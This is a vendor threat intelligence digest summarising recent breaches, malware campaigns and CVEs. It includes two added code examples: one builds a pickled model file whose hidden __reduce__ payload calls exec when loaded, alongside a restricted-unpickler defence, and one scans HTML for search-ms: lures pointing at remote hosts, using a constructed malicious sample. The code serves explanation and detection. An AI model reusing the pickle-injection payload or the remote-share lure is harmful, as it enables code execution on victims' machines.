Welcome to Ntirety's Threat Intelligence Summary, where our elite Security and Threat Response Team delivers critical insights and expert analysis. Each report highlights the most pressing cyber threats and vulnerabilities currently active, to educate and raise awareness among our partners, customers, and the broader community. Committed to securing mission-critical data, Ntirety's managed security services proactively monitor and combat these threats to ensure the safety of our customers.
- Globe Life:
American financial services holding company Globe Life says attackers may have accessed consumer and policyholder data after breaching one of its web portals. At this time, the company believes the issue is specific to the one portal and all other systems remain operational.
- Truist Bank:
U.S. commercial bank Truist confirmed its systems were breached in an October cyberattack after a threat actor posted some of the company’s data for sale on a hacking forum.
- Snowflake Update:
As many as 165 Snowflake customers are said to have had their data potentially exposed in an ongoing campaign of data theft and extortion. The threat actor, tracked as UNC5537, is financially motivated and is systematically compromising Snowflake customer tenants using stolen credentials, then advertising the victims' data for sale on cybercrime forums and attempting to extort the victims. The affected accounts were reportedly protected by a password alone, so enforcing multi-factor authentication and network allow-lists on Snowflake accounts is the immediate mitigation.
- Frontier Communications:
Frontier Communications is warning 750,000 customers that their information was exposed in a data breach after an April cyberattack claimed by the RansomHub ransomware operation. The telecommunications provider says the mid-April attack allowed the intruders to access customers' personal information.
- The New York Times:
Internal source code and data belonging to The New York Times was leaked on the 4chan message board after being stolen from the company’s GitHub repositories in January 2024. The internal data was leaked on Thursday by an anonymous user who posted a torrent to a 273 GB archive containing the stolen data.
- Arid Viper:
The threat actor known as Arid Viper has been attributed to a mobile espionage campaign that leverages trojanized Android apps to deliver a spyware strain dubbed AridSpy. The malware is distributed through dedicated websites impersonating various messaging apps, a job opportunity app, and a Palestinian Civil Registry app.
- Sleepy Pickle:
The security risks posed by Python's pickle format have once again come to the fore with the discovery of a new hybrid machine learning model exploitation technique, dubbed Sleepy Pickle. The method weaponizes the format, which is ubiquitous for packaging and distributing machine learning models, to tamper with the model itself when it is loaded. Because unpickling executes code by design, model files in this format should only be loaded from trusted sources, or through a loader that restricts which globals it will resolve.
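To show why a model file in this format is dangerous, here is an added example; it is not part of the original report or of the Sleepy Pickle research itself. The `ModelWeights`, `Payload` and loader names are hypothetical, and the payload only sets an environment variable so that its execution is observable without doing harm. The hardened loader uses the restricted-`Unpickler` approach from the Python documentation: it refuses to resolve any global not on an allowlist, which stops the `builtins.exec` reference before the loader ever calls it.

```python
import io
import os
import pickle


class ModelWeights:
    """Stand-in for a serialized ML model (a real file would carry tensors)."""

    def __init__(self, layers):
        self.layers = layers


class Payload:
    """Object whose unpickling runs attacker-chosen code.

    pickle calls __reduce__ when serializing; the (callable, args) pair it
    returns is invoked by the loader. Here the callable is builtins.exec.
    """

    # Demonstration side effect only: set an environment variable so the
    # execution is observable without touching the filesystem or a shell.
    CODE = "import os; os.environ['PICKLE_PAYLOAD_RAN'] = '1'"

    def __reduce__(self):
        return (exec, (self.CODE,))


def build_clean_blob():
    """A legitimate model file."""
    return pickle.dumps(ModelWeights(layers=[0.1, 0.2, 0.3]))


def build_poisoned_blob():
    """A model that still loads normally but carries a hidden payload.

    The payload rides along as an attribute; exec() returns None, so the
    victim receives a fully working model and sees nothing unusual.
    """
    model = ModelWeights(layers=[0.1, 0.2, 0.3])
    model._meta = Payload()
    return pickle.dumps(model)


def unsafe_load(blob):
    """What most model loaders do: trust whatever the file references."""
    return pickle.loads(blob)


class RestrictedUnpickler(pickle.Unpickler):
    """Resolve only the globals a model file legitimately needs."""

    ALLOWED = {(ModelWeights.__module__, "ModelWeights")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def safe_load(blob):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


def is_blocked(blob):
    """True when the restricted loader refuses the blob."""
    try:
        safe_load(blob)
    except pickle.UnpicklingError:
        return True
    return False


def payload_ran():
    return os.environ.get("PICKLE_PAYLOAD_RAN") == "1"


if __name__ == "__main__":
    print("clean blob accepted by restricted loader:", not is_blocked(build_clean_blob()))
    print("poisoned blob blocked by restricted loader:", is_blocked(build_poisoned_blob()))
    model = unsafe_load(build_poisoned_blob())
    print("unsafe load returned a working model:", model.layers)
    print("payload executed during unsafe load:", payload_ran())
```

The allowlist approach is the same idea behind loaders that refuse arbitrary globals (for example `torch.load(..., weights_only=True)`), but note that it only blocks code reached through globals; a model that needs many custom classes needs a correspondingly larger allowlist, which is why safer formats that cannot carry code at all are preferable where the framework supports them.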
- NoodleRAT:
A previously undocumented cross-platform malware codenamed NoodleRAT has been put to use by Chinese-speaking threat actors. NoodleRAT, which also goes by the name ANGRYREBEL, comes in both Windows and Linux variants. Both versions share identical code for command-and-control (C2) and use similar configuration formats.
- SSLoad:
The malware known as SSLoad is being delivered by means of a previously undocumented loader called PhantomLoader. The loader is added to a legitimate DLL by binary-patching the file and uses self-modifying code to evade detection.
- Operation Celestial Force:
Threat actors with ties to Pakistan have been linked to a long-running malware campaign. The activity entails the use of an Android malware called GravityRAT and a Windows-based malware loader codenamed HeavyLift.
- Windows Search Protocol:
A new phishing campaign uses HTML attachments that abuse the Windows search protocol (search-ms: URIs) to push batch files hosted on remote servers, which in turn deliver malware. The protocol lets a page force Windows Search to query a file share on a remote host and set a custom title for the search window, so the victim sees what looks like a local folder of documents while the listed files are actually served from an attacker-controlled server. Blocking HTML attachments at the mail gateway and disabling the search-ms: URI handler on endpoints are the commonly cited mitigations.
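Defenders will mostly meet this technique as an HTML attachment in mail, so the following added example (not from the original report and not tied to any particular campaign) scans HTML for search-ms: URIs, decodes them, and flags those whose `crumb=location:` points at a remote UNC or WebDAV host rather than a local folder. The sample attachment, host names and addresses are constructed for the demonstration, and treating the bare `search:` scheme as an alias of `search-ms:` is an assumption.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample of an HTML attachment of the kind described above.
# Hosts are hypothetical (203.0.113.0/24 and .test are reserved for documentation).
SAMPLE_ATTACHMENT = r"""<html><body>
<p>Your document is ready.</p>
<meta http-equiv="refresh" content="0; url=search-ms:query=invoice&amp;crumb=location:%5C%5C203.0.113.10%40SSL%5CDavWWWRoot%5Cdocs&amp;displayname=Downloads">
<script>window.location.href = "search-ms:query=*.bat&crumb=location:\\\\files.example.test\\share&displayname=Downloads";</script>
<a href="search-ms:query=report&crumb=location:C%3A%5CUsers%5CPublic&displayname=Local">open</a>
</body></html>"""

# search-ms: is the documented scheme; the shorter search: form is treated as an
# alias here (assumption). A URI runs until whitespace, a quote or an angle bracket.
URI_RE = re.compile(r"""\bsearch(?:-ms)?:[^\s"'<>]+""", re.IGNORECASE)


def parse_search_uri(uri):
    """Split a search-ms URI into its key/value parameters.

    HTML entities are decoded first (so &amp; becomes &), the parameter list
    is split on & and =, and only then are values percent-decoded, so an
    encoded %26 inside a value cannot break the split.
    """
    decoded = html.unescape(uri)
    _, _, rest = decoded.partition(":")
    params = {}
    for part in rest.split("&"):
        key, sep, value = part.partition("=")
        if sep:
            params[key.lower()] = unquote(value)
    return params


def classify_location(location):
    """Return (is_remote, host) for the value after crumb=location:."""
    lowered = location.lower()
    if lowered.startswith(("http://", "https://")):
        return True, location.split("/", 3)[2]
    if location.startswith("\\"):
        # UNC path. Sources embedded in JavaScript carry doubled backslashes,
        # so strip every leading one; a WebDAV target looks like host@SSL.
        host = location.lstrip("\\").split("\\", 1)[0].split("@", 1)[0]
        return True, host
    return False, None  # local path such as C:\Users\Public


def scan_html(text):
    """Find search-ms URIs in HTML and flag those pointing at remote hosts."""
    findings = []
    for match in URI_RE.finditer(text):
        params = parse_search_uri(match.group(0))
        crumb = params.get("crumb", "")
        location = crumb[len("location:"):] if crumb.lower().startswith("location:") else ""
        remote, host = classify_location(location)
        findings.append({
            "uri": match.group(0),
            "location": location,
            "displayname": params.get("displayname"),
            "remote": remote,
            "host": host,
        })
    return findings


if __name__ == "__main__":
    for finding in scan_html(SAMPLE_ATTACHMENT):
        verdict = "REMOTE " + finding["host"] if finding["remote"] else "local"
        print(f'{verdict:32} title={finding["displayname"]!r} location={finding["location"]!r}')
```

The decode order matters: mail scanners that only look for the literal string `\\` miss the percent-encoded form in the `<meta>` refresh, while decoding everything before splitting on `&` would let an encoded ampersand inside the `query` value hide the `crumb` parameter.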
- SecShow:
Researchers have revealed more information on a Chinese actor codenamed SecShow that has been observed conducting DNS probing on a global scale since June 2023.
- Patch Tuesday:
Microsoft has released security updates to address 51 flaws as part of its June Patch Tuesday. Of the 51 vulnerabilities, one is rated critical and 50 are rated important. At the time of writing, none of the flaws is known to be actively exploited.
- Fortinet:
Fortinet addressed multiple vulnerabilities in FortiOS and other products, including code execution flaws, stack-based buffer overflows, and cross-site scripting vulnerabilities.
- Fortinet:
State-sponsored threat actors backed by China gained access to 20,000 Fortinet FortiGate systems by exploiting a known critical security flaw (CVE-2022-42475). The campaign targeted dozens of Western governments, international organizations, and a large number of companies within the defense industry.
- WARMCOOKIE:
Researchers have disclosed details of an ongoing phishing campaign that leverages recruiting and job themed lures to deliver a Windows-based backdoor named WARMCOOKIE. WARMCOOKIE appears to be an initial backdoor tool used to scout out the victims’ networks and deploy additional payloads.
- Black Basta:
Threat actors linked to the Black Basta ransomware may have exploited a recently disclosed privilege escalation flaw in the Microsoft Windows Error Reporting Service. The flaw (CVE-2024-26169) is an elevation-of-privilege bug in the Windows Error Reporting Service that can be exploited to gain SYSTEM privileges; Microsoft patched it in March 2024.
- More_eggs:
Researchers have spotted a phishing attack distributing More_eggs malware by masquerading it as a resume. More_eggs is a modular backdoor capable of harvesting sensitive information that is believed to be the work of the threat actor known as Golden Chickens.
- ValleyRAT:
Researchers have uncovered an updated version of malware called ValleyRAT that is being distributed as part of a new campaign. The latest version of ValleyRAT introduces new commands, such as capturing screenshots, process filtering, forced shutdown, and clearing Windows event logs.
- Arm:
Arm has issued a security bulletin warning of a memory-related vulnerability in its Bifrost and Valhall GPU kernel drivers that is being exploited in the wild. The issue (CVE-2024-4610) is a use-after-free vulnerability that affects all versions of the Bifrost and Valhall drivers from r34p0 through r40p0. Because these drivers ship inside vendor Android kernels, the fix reaches end users only through OEM firmware updates.
- Veeam:
A proof-of-concept exploit for a Veeam Backup Enterprise Manager authentication bypass flaw (CVE-2024-29849) is now publicly available, making it urgent that admins apply the latest security updates. Veeam issued a security bulletin about the critical flaw in May; with an exploit now public, upgrading to VBEM version 12.1.2.172 should not wait.
- Netgear:
Researchers have found half a dozen vulnerabilities of varying severity in the Netgear WNR614 N300 router. The device has reached end of life but is still present in many environments because of its reliability, ease of use, and performance. Netgear is not expected to release security updates for the vulnerabilities, so replacing the devices with a supported model is recommended.
- DDoS:
Hacktivists are conducting DDoS attacks on European political parties that represent and promote strategies opposing their interests. Cloudflare reports that it has mitigated at least 3 DDoS attack waves on various election-related sites in the Netherlands.
- Sticky Werewolf:
Researchers have disclosed details of a threat actor known as Sticky Werewolf that has been linked to cyber-attacks targeting entities in Russia and Belarus. The phishing attacks were aimed at a pharmaceutical company this time around. In previous campaigns the infection chain began with phishing emails containing a link to download a malicious file from platforms like gofile.io, but this latest campaign used archive files containing LNK files pointing to a payload stored on WebDAV servers.
- LightSpy:
Researchers have disclosed that the LightSpy spyware recently identified as targeting Apple iOS users is in fact a previously undocumented macOS variant of the implant. The threat actor group used two publicly available exploits (CVE-2018-4233, CVE-2018-4404) to deliver implants for macOS.
- EmailGPT:
A critical security flaw has been reported in EmailGPT, an AI email-writing assistant. The vulnerability (CVE-2024-5184) is a prompt injection flaw that lets malicious actors manipulate the service's underlying model, potentially leading to the compromise of sensitive data.
Concerned about the security of your network, systems, applications, or data? Given the ever-growing list of cyber threats, your concerns are justified.
For over 25 years, Ntirety has been at the forefront of helping organizations anticipate and stay protected from both known and emerging cyber threats. Contact us to discover how our proactive managed security services can strengthen your organization's security posture and provide peace of mind.